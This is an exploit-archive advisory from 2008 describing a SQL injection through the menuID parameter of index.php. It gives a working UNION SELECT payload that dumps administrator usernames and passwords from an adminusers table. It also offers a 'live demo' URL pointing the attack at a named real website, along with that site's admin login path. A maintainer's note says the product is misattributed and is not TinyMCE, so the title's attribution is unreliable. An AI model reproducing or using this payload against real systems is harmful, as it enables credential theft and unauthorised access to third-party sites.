[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability
# Published : 2008-12-17
# Author : AnGeL25dZ
# Previous Title : Joomla Component Tech Article 1.x (item) SQL Injection Vulnerability
# Next Title : Lizardware CMS <= 0.6.0 Blind SQL Injection Exploit
# removed from the frontend, the product affected isn't TinyMCE.
# if you know which CMS this is please contact me
# /str0ke
************************************************************
** TinyMCE Remote SQL Injection
************************************************************
** Prodcut: TinyMCE Version 2.0.1
** Home : http://tinymce.moxiecode.com
** Vunlerability : 2/ SQL Injection
** Risk : high !!
** Dork : N/A
************************************************************
** Discovred by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** Ra3ch, His0k4
************************************************************
** Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************
# www.Syue.com [2008-12-17]